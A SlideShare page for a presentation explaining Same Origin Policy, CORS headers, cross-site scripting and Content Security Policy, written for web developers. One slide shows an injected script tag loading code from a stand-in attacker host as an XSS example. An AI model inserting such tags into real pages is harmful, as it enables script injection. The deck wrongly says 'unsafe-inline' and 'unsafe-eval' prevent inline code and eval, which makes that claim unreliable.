SlideShare une entreprise Scribd logo

Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy

Télécharger en tant que PPTX, PDF
S
subbul

Presentation about Same Origin Policy, CORS, Content SecurityPolicy, XSS

TechnologieDesign
1  sur  18
Same Origin Policy Cross-Origin Resource Sharing Content Security Policy subbul@gmail.com
Agenda • • • • Need for SOP How CORS help SOP What is XSS? How CSP helps preventing XSS
Why Same Origin Policy ? • What if your personal data you are entering in a “Bank” page in Browser is accessible to another Page in the browser Instance
What is Same Origin Policy • This is a Browser Mechanism to allow trusted pages/scripts • To Prevent HTML/JS Application from different window, domain accessing the DOM, data of Application current domain or “Origin” • Thanks to Same Origin Policy (SOP), Browser prevents loading or blocks request for DOM access, execution of script from “Origin/Domain” other than “Self” • More Details
What are allowed in SOP? • SOP cannot prevent cross site content inclusions (like images, scripts, css from different domain • http://www.google.com/page1 can access http://www.google.com/page2 • http://www.google.com/page1 cannot access http://www.yahoo.com as the two pages belong to different domain • <script> is allowed by SOP [file:// ??] • In a http://www.mypage.com page, you can include<script src= http://api.google.com/googleplus >. • Google API page scripts are executed in “Mypage” domain, HTML Application, it will still have access to “Mypage” DOM elements. So, if the “Google API scripts” are compromised, it will have bad effect on the “MyPage” (Will take it to XSS- Cross Site Scripting)
What is not allowed in SOP? • AJAX (XHR) from One domain to another • XHR request from “MyPage.com” to “Google.com” • Why it is not allowed? – Using AJAX you can download a malicious JS code and could spoil the current page information or could derive information from current page and send it over maliciously to remote pages
How to circumvent SOP • • • • Simple suggestion DO NOT USE ( unless it’s the End of the World) Document.domain PostMessage JSONP • Right Way – CORS (Cross-Origin Resource Sharing)
Cross-Origin Resource Sharing • CORS is to overcome SOP for XHR • Allowing Cross Origin Request from Domain A to Domain B using XHR • Introduction of new HTTP Headers (Origin) from Server to make Browser decide to Allow Cross-Origin request or not • Use Pre-flight (handshake) OPTIONS request for methods other than POST/GET to know if the server supports, allow-origin for your request More Detail
How CORS works?
CORS HTTP Request/Response Headers HTTP Request/ ResponseHeader Parameter Description Example Access-Control-AllowOrigin: <origin> | * Specifying a particular “domain” is allowed or “*” all Access-Control-AllowOrigin: http://mozilla.com Access-Control-AllowCredentials True| false Request for cookie along with request Access-ControlRequest-Method GET,POST Request for supported HTTP methods Access-Control-AllowHeaders Content-Type| Custom-Header Preflight-request headers
CORS Server/Browser Request /Response Flow http://www.html5rocks.com/static/images/cors_server_flowchart.png
XSS (Cross Site Scripting) • Finding Vulnerability of Web Pages and injecting and injecting malicious client side- script . • Types – Non-Persistent (server Echo’s back your request) – Adding malicious scripts in HTML Forms, HTTP Query from web browser during a search request. If the “String” is not formatted/escaped, the injected script will be executed back in client browser. – E.g., • Phishing Attacks, • URL Shortens (bit.ly ) taking to legitimate page and injecting their “script” along with it
XSS (Cross Site Scripting) – Persistent (Server stores the data and script) – Storing user provided “string” as is without escaping the HTML, JS code in Webserver and serving later to all users will cause the malicious script to execute on client browser – Message Boards, which include Plain Text and Scripts, later when another user reloads the Message Board, the malicious code executes and steals user data – Defacing web servers, cookie/session stealing
Examples • http://www.insecurelabs.org/Task/Rule1 • http://www.insecurelabs.org • https://www.owasp.org/index.php/Testing_for_Reflected_Cros s_site_scripting_(OWASP-DV-001)
How to Prevent XSS • • • • • Validation/Sanitization of ALL user inputs in a page No inline please, keep it safe in a dedicated JS Secure all input path, query string, file path etc Don’t keep untrusted data in your HTML, JS This is one of the reason, you find forms in organization preventing <, > etc  • https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Pre vention_Cheat_Sheet • And of course CSP (Content Security Policy)
Content Security Policy (CSP) • It’s a policy how Browser/UserAgent adhere to as a directive from HTTP Server in order to display, execute scripts • New HTTP Headers introduced to enable CSP • Content-Security-Policy: script-src 'self' Trusted Source https://abc.MyWebpage.com Resource Trusted Source
Content Security Policy • If a malicious code is injected through XSS (added <script src=“hackedsite.com”>), browser will detect and prevent • More XSS prevention by • 'unsafe-inline' prevents inline JavaScript and CSS • 'unsafe-eval' prevents text-to-JavaScript mechanisms like eval • Default-src “none” (Shut down any other script, img, media load beyond my own) • Other resources which can be controlled by CSP are font-src,img-src etc – – – – http://www.html5rocks.com/en/tutorials/security/content-security-policy/ http://erlend.oftedal.no/blog/csp/readiness/ http://people.mozilla.org/~bsterne/content-security-policy/details.html https://wiki.mozilla.org/index.php?title=Security/CSP/Spec&oldid=133465
Thank You

Recommandé

Same origin policy
Same origin policySame origin policy
Same origin policyVivek Madurai
 
Javascript cross domain communication
Javascript cross domain communicationJavascript cross domain communication
Javascript cross domain communicationChenKuo Chen
 
Cross site calls with javascript - the right way with CORS
Cross site calls with javascript - the right way with CORSCross site calls with javascript - the right way with CORS
Cross site calls with javascript - the right way with CORSMichael Neale
 
Web Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSWeb Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSPerfectial, LLC
 
CORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORSCORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORSJared Ottley
 
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Evan J Johnson (Not a CISSP)
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORSVladimir Dzhuvinov
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)securityn|u - The Open Security Community
 

Recommandé

Same origin policy
Same origin policySame origin policy
Same origin policyVivek Madurai
 
Javascript cross domain communication
Javascript cross domain communicationJavascript cross domain communication
Javascript cross domain communicationChenKuo Chen
 
Cross site calls with javascript - the right way with CORS
Cross site calls with javascript - the right way with CORSCross site calls with javascript - the right way with CORS
Cross site calls with javascript - the right way with CORSMichael Neale
 
Web Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSWeb Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSPerfectial, LLC
 
CORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORSCORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORSJared Ottley
 
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Evan J Johnson (Not a CISSP)
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORSVladimir Dzhuvinov
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)securityn|u - The Open Security Community
 
Breaking The Cross Domain Barrier
Breaking The Cross Domain BarrierBreaking The Cross Domain Barrier
Breaking The Cross Domain BarrierAlex Sexton
 
RESTful Web Services
RESTful Web ServicesRESTful Web Services
RESTful Web ServicesChristopher Bartling
 
Basic web architecture
Basic web architectureBasic web architecture
Basic web architectureRalu Mihordea
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
01. http basics v27
01. http basics v2701. http basics v27
01. http basics v27Eoin Keary
 
Modernizr, Yepnope, and Polyfills
Modernizr, Yepnope, and PolyfillsModernizr, Yepnope, and Polyfills
Modernizr, Yepnope, and PolyfillsAlex Sexton
 
Your rest api using laravel
Your rest api using laravelYour rest api using laravel
Your rest api using laravelSulaeman .
 
Building Awesome APIs with Lumen
Building Awesome APIs with LumenBuilding Awesome APIs with Lumen
Building Awesome APIs with LumenKit Brennan
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fuAditya Balapure
 
Cors michael
Cors michaelCors michael
Cors michaelMichael Neale
 
Web Architecture
Web ArchitectureWeb Architecture
Web Architecturesudip pudasaini
 
Basic Introduction About API Web Service
Basic Introduction About API Web ServiceBasic Introduction About API Web Service
Basic Introduction About API Web ServiceHiraq Citra M
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStationArabNet ME
 
PHP BASIC PRESENTATION
PHP BASIC PRESENTATIONPHP BASIC PRESENTATION
PHP BASIC PRESENTATIONkrutitrivedi
 
REST in peace @ IPC 2012 in Mainz
REST in peace @ IPC 2012 in MainzREST in peace @ IPC 2012 in Mainz
REST in peace @ IPC 2012 in MainzAlessandro Nadalin
 
REST Easy - Building RESTful Services in Zend Framework
REST Easy - Building RESTful Services in Zend FrameworkREST Easy - Building RESTful Services in Zend Framework
REST Easy - Building RESTful Services in Zend FrameworkChris Weldon
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
SOAP-based Web Services
SOAP-based Web ServicesSOAP-based Web Services
SOAP-based Web ServicesKatrien Verbert
 
Your first sitemap.xml and robots.txt implementation
Your first sitemap.xml and robots.txt implementationYour first sitemap.xml and robots.txt implementation
Your first sitemap.xml and robots.txt implementationJérôme Verstrynge
 
Robots.txt and Sitemap.xml Creation
Robots.txt and Sitemap.xml CreationRobots.txt and Sitemap.xml Creation
Robots.txt and Sitemap.xml CreationJahid Hasan
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
 

Contenu connexe

Tendances

Breaking The Cross Domain Barrier
Breaking The Cross Domain BarrierBreaking The Cross Domain Barrier
Breaking The Cross Domain BarrierAlex Sexton
 
Basic web architecture
Basic web architectureBasic web architecture
Basic web architectureRalu Mihordea
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
01. http basics v27
01. http basics v2701. http basics v27
01. http basics v27Eoin Keary
 
Modernizr, Yepnope, and Polyfills
Modernizr, Yepnope, and PolyfillsModernizr, Yepnope, and Polyfills
Modernizr, Yepnope, and PolyfillsAlex Sexton
 
Your rest api using laravel
Your rest api using laravelYour rest api using laravel
Your rest api using laravelSulaeman .
 
Building Awesome APIs with Lumen
Building Awesome APIs with LumenBuilding Awesome APIs with Lumen
Building Awesome APIs with LumenKit Brennan
 
Basic Introduction About API Web Service
Basic Introduction About API Web ServiceBasic Introduction About API Web Service
Basic Introduction About API Web ServiceHiraq Citra M
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStationArabNet ME
 
PHP BASIC PRESENTATION
PHP BASIC PRESENTATIONPHP BASIC PRESENTATION
PHP BASIC PRESENTATIONkrutitrivedi
 
REST in peace @ IPC 2012 in Mainz
REST in peace @ IPC 2012 in MainzREST in peace @ IPC 2012 in Mainz
REST in peace @ IPC 2012 in MainzAlessandro Nadalin
 
REST Easy - Building RESTful Services in Zend Framework
REST Easy - Building RESTful Services in Zend FrameworkREST Easy - Building RESTful Services in Zend Framework
REST Easy - Building RESTful Services in Zend FrameworkChris Weldon
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
Your first sitemap.xml and robots.txt implementation
Your first sitemap.xml and robots.txt implementationYour first sitemap.xml and robots.txt implementation
Your first sitemap.xml and robots.txt implementationJérôme Verstrynge
 
Robots.txt and Sitemap.xml Creation
Robots.txt and Sitemap.xml CreationRobots.txt and Sitemap.xml Creation
Robots.txt and Sitemap.xml CreationJahid Hasan
 

Tendances (20)

Breaking The Cross Domain Barrier
Breaking The Cross Domain BarrierBreaking The Cross Domain Barrier
Breaking The Cross Domain Barrier
 
RESTful Web Services
RESTful Web ServicesRESTful Web Services
RESTful Web Services
 
Basic web architecture
Basic web architectureBasic web architecture
Basic web architecture
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser Security
 
01. http basics v27
01. http basics v2701. http basics v27
01. http basics v27
 
Modernizr, Yepnope, and Polyfills
Modernizr, Yepnope, and PolyfillsModernizr, Yepnope, and Polyfills
Modernizr, Yepnope, and Polyfills
 
Your rest api using laravel
Your rest api using laravelYour rest api using laravel
Your rest api using laravel
 
Building Awesome APIs with Lumen
Building Awesome APIs with LumenBuilding Awesome APIs with Lumen
Building Awesome APIs with Lumen
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fu
 
Cors michael
Cors michaelCors michael
Cors michael
 
Web Architecture
Web ArchitectureWeb Architecture
Web Architecture
 
Basic Introduction About API Web Service
Basic Introduction About API Web ServiceBasic Introduction About API Web Service
Basic Introduction About API Web Service
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStation
 
PHP BASIC PRESENTATION
PHP BASIC PRESENTATIONPHP BASIC PRESENTATION
PHP BASIC PRESENTATION
 
REST in peace @ IPC 2012 in Mainz
REST in peace @ IPC 2012 in MainzREST in peace @ IPC 2012 in Mainz
REST in peace @ IPC 2012 in Mainz
 
REST Easy - Building RESTful Services in Zend Framework
REST Easy - Building RESTful Services in Zend FrameworkREST Easy - Building RESTful Services in Zend Framework
REST Easy - Building RESTful Services in Zend Framework
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
SOAP-based Web Services
SOAP-based Web ServicesSOAP-based Web Services
SOAP-based Web Services
 
Your first sitemap.xml and robots.txt implementation
Your first sitemap.xml and robots.txt implementationYour first sitemap.xml and robots.txt implementation
Your first sitemap.xml and robots.txt implementation
 
Robots.txt and Sitemap.xml Creation
Robots.txt and Sitemap.xml CreationRobots.txt and Sitemap.xml Creation
Robots.txt and Sitemap.xml Creation
 

Similaire à Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy

Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Stormpath
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Web security for app developers
Web security for app developersWeb security for app developers
Web security for app developersPablo Gazmuri
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018Marius Vorster
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)Sam Bowne
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresRoel Palmaers
 
CNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesCNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesSam Bowne
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
Of CORS thats a thing how CORS in the cloud still kills security
Of CORS thats a thing how CORS in the cloud still kills securityOf CORS thats a thing how CORS in the cloud still kills security
Of CORS thats a thing how CORS in the cloud still kills securityJohn Varghese
 

Similaire à Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy (20)

Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 
Web security for app developers
Web security for app developersWeb security for app developers
Web security for app developers
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
 
Flashack
FlashackFlashack
Flashack
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
CNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesCNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application Technologies
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
 
Of CORS thats a thing how CORS in the cloud still kills security
Of CORS thats a thing how CORS in the cloud still kills securityOf CORS thats a thing how CORS in the cloud still kills security
Of CORS thats a thing how CORS in the cloud still kills security
 

Dernier

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 

Dernier (20)

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 

Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy

  • 1. Same Origin Policy Cross-Origin Resource Sharing Content Security Policy subbul@gmail.com
  • 2. Agenda • • • • Need for SOP How CORS help SOP What is XSS? How CSP helps preventing XSS
  • 3. Why Same Origin Policy ? • What if your personal data you are entering in a “Bank” page in Browser is accessible to another Page in the browser Instance
  • 4. What is Same Origin Policy • This is a Browser Mechanism to allow trusted pages/scripts • To Prevent HTML/JS Application from different window, domain accessing the DOM, data of Application current domain or “Origin” • Thanks to Same Origin Policy (SOP), Browser prevents loading or blocks request for DOM access, execution of script from “Origin/Domain” other than “Self” • More Details
